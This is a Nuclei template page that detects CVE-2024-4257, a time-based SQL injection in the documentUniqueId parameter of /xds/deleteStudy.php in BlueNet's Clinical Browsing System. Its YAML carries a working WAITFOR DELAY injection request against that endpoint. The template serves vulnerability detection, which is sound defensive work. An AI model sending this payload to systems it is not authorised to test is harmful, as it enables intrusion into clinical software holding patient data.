Skip to content
Nuclei Templates

BlueNet Technology Clinical Browsing System 1.2.1 - Sql Injection

ID: CVE-2024-4257

Severity: medium

Author: s4e-io

Tags: time-based-sqli,cve,cve2024,sqli,blunet

Description

Section titled “Description”

A vulnerability was found in BlueNet Technology Clinical Browsing System 1.2.1. It has been classified as critical. This affects an unknown part of the file /xds/deleteStudy.php. The manipulation of the argument documentUniqueId leads to sql injection. It is possible to initiate the attack remotely.

YAML Source

Section titled “YAML Source”
id: CVE-2024-4257


info:
  name: BlueNet Technology Clinical Browsing System 1.2.1 - Sql Injection
  author: s4e-io
  severity: medium
  description: |
    A vulnerability was found in BlueNet Technology Clinical Browsing System 1.2.1. It has been classified as critical. This affects an unknown part of the file /xds/deleteStudy.php. The manipulation of the argument documentUniqueId leads to sql injection. It is possible to initiate the attack remotely.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4257
    - https://github.com/GAO-UNO/cve/blob/main/sql.md
    - https://vuldb.com/?submit.321338
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 6.3
    cve-id: CVE-2024-4257
    cwe-id: CWE-89
    epss-score: 0.00045
    epss-percentile: 0.15929
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="LANWON-临床浏览系统"
  tags: time-based-sqli,cve,cve2024,sqli,blunet


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET /login.php HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"<title>临床浏览</title>")'
          - 'contains(header,"text/html")'
          - "status_code == 200"
        condition: and
        internal: true


  - raw:
      - |
        @timeout 20s
        GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:6%27-- HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - 'contains(header,"text/html")'
          - "status_code == 200"
        condition: and
# digest: 490a004630440220698fe07a5ec46dd2db1531175c589b98419f404a1d1ce05477f7790debec3a3d022072c970e16e3ee47167703bc264be8cc07df96331135779644d3ba8a789033d1c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-4257.yaml"

View on Github